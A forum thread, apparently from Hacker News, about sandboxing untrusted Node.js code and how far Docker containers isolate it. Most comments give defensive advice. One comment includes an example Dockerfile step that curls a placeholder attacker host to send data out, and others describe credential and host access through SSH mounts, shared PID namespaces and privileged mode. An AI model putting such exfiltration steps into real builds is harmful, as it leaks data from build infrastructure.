Anyone have advice or links on how to dynamically run untrusted code in production? Specifically Node.js.
It looks like the isolated-vm package is the go-to, but understandably it prevents things like fetch or being able to import packages.
I’m thinking to use docker and have a single base image that exposes an API that will take an arbitrary string, check for and install imports, then eval (eesh) the code, but before going down the road of implementing it myself and going crazy over properly securing the containers I’m thinking that there has got to be some prior art. How are Codesandbox et al doing it?
I recommend gvisor: https://gvisor.dev/
If you want to learn more about this subject the keyword you’re looking for is “multitenancy”
Docker’s container runtime is not really a safe way to run untrusted code. I don’t recommend relying on it.
Also, why would an isolated vm prevent fetch? You can give your users NAT addresses to let them make outbound network calls. I am putting the finishing touches on a remote IDE that does exactly that.
I would give you a hundred upvotes if I could. This is a fantastic resource, looks perfect for what I want
Keep Docker. As long as you do not expose volumes back to the host system, it is reasonably safe (despite the misconceptions, it ships with good security defaults).
If you want to lock this down further, there are tools such as AppArmor and seccomp for which you can add custom profiles, but a good starting point would be:
docker run --security-opt no-new-privileges --cap-drop ALL untrusted-image
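Expanding on that starting point, a more locked-down invocation might look like the following sketch (the seccomp profile path is a placeholder, and the resource limits should be tuned to the workload):

```shell
# Placeholder profile path -- write or generate one for your workload.
docker run \
  --security-opt no-new-privileges \
  --security-opt seccomp=/path/to/profile.json \
  --cap-drop ALL \
  --read-only --tmpfs /tmp \
  --network none \
  --pids-limit 128 \
  --memory 256m --cpus 0.5 \
  untrusted-image
```

--read-only plus --tmpfs gives the workload scratch space without a writable root filesystem, and --network none is the safest default if the code doesn't need outbound access.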
Thanks!
Depending on your criteria, a server like https://github.com/supabase/edge-runtime could be a fit.
What is your threat model / what are you trying to stop from happening?
I want to prevent attempts to, for example, break out of the container into the parent system.
Nsjail, firecracker, gVisor, or v8 isolates are all good options with different tradeoffs
I'm a bit disappointed. I thought the article would have some discussion on how to actually build untrusted container images in a safe way, but it is really just about how to connect to the Depot API and have it do it for you. I imagine there must be something inside there that answers that part (from some of their other articles, maybe that's BuildKit? unsure).
I'm confused--what's the security risk in building a container?
Fundamentally, building a container involves running a container: each layer is executed in turn as a temporary container.
Building one therefore carries the same risks as running an unknown one.
For reference there have been quite a few CVEs related to container escape: https://www.paloaltonetworks.com/blog/cloud-security/leaky-v...
You're running untrusted code. Every RUN command in a user's Dockerfile is executed during build, which means you're executing arbitrary commands from strangers on your own infrastructure. If you're not isolating that properly, it's a security risk.
Inside the container though. The whole point of which is that it sandboxes and isolates the running code.
Containers in Linux are primarily a shipping method (as Docker themselves try to tell you with the visual of a shipping container).
Just like real shipping containers, dangerous things inside can leak out. The isolation is not foolproof by any means; in fact, if someone has the express wish of violating the isolation boundary, it's barely an inconvenience.
I don't think that's the whole story. There's no documented way to escape the container. The kernel provides namespace isolation, which should be foolproof by design. You might argue that there have been many bugs that allowed container escapes, and that more will probably be found in the future. But that doesn't make it fair to call escaping an "inconvenience". I don't know of any zero-day bugs in Linux, and probably neither do you. It would take me a lot of effort to even attempt to find one.
> should be foolproof by design.
I think this is a core reason why containers have such a horrible security track record: they weren't designed as a coherent whole.
One of the big problems is that there is no create_container(2) syscall. There are eight(?) different namespaces which, in conjunction with cgroups, make up a "container", and they are infinitely configurable. That is problematic and a core reason why we see container escapes almost every other month. Just look at user namespaces: some people use them and some don't, and it was only a few months ago that multiple bypasses were published for them.
No company today will let you run your own code on their server if the only thing that's sandboxing it are containers. On the other hand, every VPS provider happily lets you do whatever you want inside their VM/hypervisor. This should tell you all you need to know about the security guarantees of Linux containers compared to hypervisors.
Namespaces are not a security feature, they are... namespaces.
In k8s, for example, if you share your PID namespace in a pod (a simple config option), you can arbitrarily enter another pod member's filesystem tree via /proc/PID/root, protected only by Unix permissions.
Without seccomp, capabilities, SELinux, etc., anyone who can launch a Docker container can use the --privileged flag and change host firmware or view any filesystem, including the host's root.
Focusing on namespace breakout only misses most of the attack surface.
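The /proc/PID/root mechanism mentioned above is easy to see on any Linux box against your own process:

```shell
# /proc/<pid>/root is a "magic" symlink into that process's mount
# namespace. For our own process it simply resolves to /:
readlink /proc/self/root
# In a pod with a shared PID namespace, the same path for a sibling
# container's PID drops you into *its* root filesystem, gated only by
# ordinary Unix permissions.
```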
Linux kernel code has had many zero-day bugs and will continue to do so. Kernel programming is _incredibly_ hard and unforgiving.
This blog post[1] explains why that is not a safe assumption.
[1]: https://www.aquasec.com/blog/container-isolation/
Maybe the default form of RUN is kinda sorta safe [0].
How about ADD? Or COPY? Or RUN --mount=type=bind,rw…?
Over the last ten years or so we’ve progressed from subtle-ish security holes due to memory unsafety and such to shiny tools in shiny safe languages that have absolutely gaping security and isolation holes by design. Go us.
[0] There is some serious wishful thinking involved there.
> Or RUN --mount=type=bind,rw…?
This seems to be pretty safe, according to the docs, if I understand them correctly. A bind mount can only mount "context directories" and the rw option will discard the written data, it says.
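For reference, the form being discussed looks like this (the target path and commands are just illustrative):

```dockerfile
# syntax=docker/dockerfile:1
FROM alpine
# Bind-mounts the build context at /src for this single RUN step.
# With rw, writes land in a throwaway scratch layer and are discarded
# when the step finishes -- they never reach the context on the host.
RUN --mount=type=bind,target=/src,rw \
    ls /src && touch /src/scratch-file
```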
No way, you're right, they actually tried to make it kind of sensible.
Too bad there's also:
Steal my credentials (temporarily, but still...) to access remote systems without restriction:
RUN --mount=type=ssh
Access TCP and UDP ports without restriction, including anything exported by any other container I'm running, because Docker has no real security model. Outright pwn me, but only if "entitled".
Containers are not virtualization. They only provide lightweight isolation, as they share the host kernel.
So if you want sandboxing and proper isolation, use a VM.
https://learn.microsoft.com/en-us/virtualization/windowscont...
The network isn't usually isolated, and a build file can arbitrarily switch to the root user.
There is some isolation, but not complete isolation.
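To illustrate: build steps run as root inside the build container by default and normally have outbound network access, so a hostile Dockerfile can do things like the following (attacker.example is a placeholder):

```dockerfile
FROM alpine
# Runs as root by default -- no USER directive needed.
# Outbound network is normally available during build:
RUN apk add --no-cache curl && \
    curl -s "https://attacker.example/exfil?host=$(hostname)"
```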
Build environments are usually "soft targets" in most organizations.
Especially ones that utilize a lot of the "CI/CD" pipeline approach.
Lots of secrets getting pulled from various different places, access to testing environments and testing databases needed for unit testing, access to systems that deploy to testing and prod environments. Sensitive code and secrets from multiple applications being used in the same servers and build infrastructure, etc.
So even if you trust containers to containerize securely (which is a bad idea in practice), there are all sorts of holes being poked in them to allow them to integrate with and access other things, even during building and testing.
Most security effort in most organizations goes into hardening the parts of production systems that are exposed to users and/or the internet. That involves not only hardening code and setting up firewalls, WAFs, and such things, but also monitoring and so on.
That is expensive and a lot of work, while build environments tend to be more slapped together, and people ignore them until something breaks.
You have a similar situation with backup solutions. People need backups to protect data from corruption or deletion and thereby protect the business, but backups as a potential security hole aren't thought about in the same way as running a production web server. Again, just enough effort is put in to make sure they work, and little attention is given to them unless they break.